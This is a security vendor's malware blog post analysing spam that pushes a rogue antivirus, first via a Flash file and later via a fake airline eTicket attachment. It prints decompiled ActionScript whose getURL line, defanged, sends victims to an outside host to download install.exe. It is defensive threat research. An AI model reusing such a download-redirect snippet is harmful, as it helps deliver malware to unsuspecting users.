Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us

    We’re seeing a lot of spam right now using the now annoyingly familiar Free Update Windows XP,Vista spam template. This time though, instead of linking to an .EXE file, it is now pointing to an .SWF file.

    Figure 1. Seen before: Spam announcing a free update for Windows XP and Vista

    The SWF file linked via the large-font text Free Update Windows XP,Vista contains Flash ActionScript. One of the SWFs captured decompiles to the following (http changed to hxxp where it occurs below):

    movie '82029540ui0.swf' {
    // flash 6, total frames: 3, frame rate: 50 fps, 978x580 px, compressed
      // unknown tag 777 length 3
      movieClip 5 TextBox {
      frame 2 {
        getURL('hxxp://89.xx.49.18/install.exe', '_self');
      frame 3 {

    This is what it looks like when opened in a browser.

    Figure 2. Seen just now: SWF files instead of the typical EXE.

    Running the install.exe will make the desktop look like this.

    Figure 3. Seen before: “WARNING! Spyware detected!”

    After this a EULA window appears, and then the system proceeds to install a rogue AV software from Note that it does this automatically from the moment the install.exe is run:

    Figure 4. Yet another rogue AV product hosted on a fresh domain (this one created August 20).

    The technique used in the spam has two things going for it: 1. the use of SWF instead of EXE and 2. the use of an ImageShack-hosted file, both of which may suggest to normal users that the file is possibly harmless. So it seems the siege of rogue AV is not only not dying down, its proponents are becoming more creative in their “advertising” schemes.

    We detect this rogue AV as TROJ_FAKEAV.IG.

    Update as of 1 Sept, 2008 5:00 AM PST:

    Senior Threat Researcher Loucif Kharouni found another variant of this malware-bearing spam, posing as an email from the Northwest Airlines. The spammed message comes with an attached file, which the message says is an eTicket. Unlike the first attack which involved a crafted malicious .SWF file, this spam contains the malware itself, as the attached eTicket is no ticket, but the malware itself. Here is a screenshot of the said spammed message:

    Executing the file contained also leads to the installation of the rogue AV detected as TROJ_FAKEAV.IG.

    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice